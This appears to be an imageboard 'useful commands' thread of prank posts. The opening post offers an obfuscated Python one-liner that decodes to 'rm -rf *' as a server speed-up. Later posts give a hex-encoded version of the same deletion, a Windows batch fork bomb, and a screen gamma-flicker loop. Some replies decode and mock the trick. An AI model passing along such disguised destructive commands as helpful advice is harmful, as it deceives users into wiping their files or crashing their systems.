Python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'

python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'
I heard this command speeds up your server. Is it true?

People don't lie on the internet bruh



thing is so disgusting, why did they let that happen?


You're right, who would do such a thing?

in which language ARE strings lists of characters, directly

No but looks cleaner now. Thanks OP.

Useful commands thread?
Useful commands thread.
$(echo 726d202d7266202a | xxd -r -p)

Do this on windows


If you dare [spoiler]:^)[/spoiler]

>sn sg

Are you sure? It got rid of some of the bloat on mine.


%0: Command not found.
%0: Command not found.

>that -1
>that sn!
i despise python and not even i need to look at anything else to know what that shit is going/trying to do
really weak sauce...


rm -rf / doesn't work you idiot. You need to add --no-perserve-root.

Give me something that will wreck my XP vm.

try putting it in a .bat file

>this is what cucks ACTUALLY look like

> :m Data.Char
> map (chr . pred . ord) "sn!.sg!+"
"rm -rf *"

install gentoo

Depends on the distro

> pred "sn!.sg!+"
"rm -rf *"

echo %0|%0 > x.bat && x

wrong board, that's what half of cs students look like

i didn't know that Char was an instance of the Enum type class

while :; do xrandr --output $(xrandr | awk '/ connected/ { print $1 }') --gamma 0.$((RANDOM%9)):0.$((RANDOM%9)):0.$((RANDOM%9)); done
# remedy:
xrandr --output $(xrandr | awk '/ connected/ { print $1 }') --gamma 1:1:1

base64 -d

I never understood why people don't just use /* instead.